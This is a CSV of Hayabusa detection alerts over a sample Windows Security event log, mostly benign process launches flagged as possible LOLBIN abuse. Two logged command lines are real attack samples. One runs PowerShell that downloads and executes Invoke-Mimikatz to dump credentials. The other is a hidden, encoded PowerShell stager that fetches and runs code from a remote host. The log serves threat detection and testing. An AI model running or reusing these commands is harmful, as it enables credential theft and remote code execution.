2016-08-25 07:44:02.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lnyiquaj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x818 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:43.530 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:43.908 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:45.304 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zqai1ke3.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb8c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:54.936 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:54.972 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:45:57.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\lygfnats.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0x21c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:47:33.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcd8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:47:34.016 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:49:42.000 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0x708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:50:40.032 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" Command | Path: C:\Windows\System32\findstr.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:53:47.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:54:04.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" ""Command Line"" | Path: C:\Windows\System32\findstr.exe | PID: 0xb78 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 07:59:07.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" csc | Path: C:\Windows\System32\findstr.exe | PID: 0x9c8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-25 08:01:26.782 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x5b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:05.916 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:06.884 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc34 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:06.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:03:25.697 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x764 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:23:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe54 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:23:21.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:25:21.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x7d4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 00:38:00.158 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:43:45.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x318 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:43:48.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x488 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:44:06.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x64c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:46:45.647 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:58:45.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x780 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:58:46.850 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Users\IEUser\Desktop\launcher.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0x9c0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JAB3AEMAPQBOAGUAVwAtAE8AQgBKAGUAYwBUACAAUwB5AHMAVABlAG0ALgBOAEUAdAAuAFcARQBiAEMATABpAEUAbgBUADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABFAEEARABlAHIAUwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBDAC4AUAByAG8AWABZACAAPQAgAFsAUwB5AFMAVABlAE0ALgBOAGUAVAAuAFcARQBCAFIARQBxAHUAZQBTAFQAXQA6ADoARABlAEYAYQB1AGwAdABXAGUAQgBQAFIAbwBYAHkAOwAkAHcAQwAuAFAAUgBvAHgAWQAuAEMAUgBlAEQARQBOAHQASQBBAEwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAFQALgBDAHIAZQBEAEUAbgBUAGkAQQBsAEMAYQBjAEgARQBdADoAOgBEAGUAZgBhAFUATAB0AE4ARQB0AHcATwByAGsAQwBSAEUARABFAE4AdABpAGEATABzADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMAaABhAFIAWwBdAF0AJABiAD0AKABbAGMASABBAFIAWwBdAF0AKAAkAFcAYwAuAEQATwB3AG4ATABPAEEAZABTAFQAcgBJAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADAALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAEIAWABvAFIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAGcAVABIAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8ASQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe0 | User: IEUser | LID: 0x4d011,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa48 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 06:11:59.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\gpedit.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 07:17:58.251 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x500 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-26 07:17:58.259 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa9c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:34:50.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x700 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:34:50.394 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb98 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:34:51.064 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xed8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:34:51.099 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:36:35.595 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:38:39.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa04 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:38:44.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:38:58.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfa8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:54:34.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa5c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:54:34.019 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x77c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:54:34.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xbd4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 05:56:33.997 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xcd0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 09:49:33.186 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-27 09:49:33.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:20:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x550 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:20:56.608 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
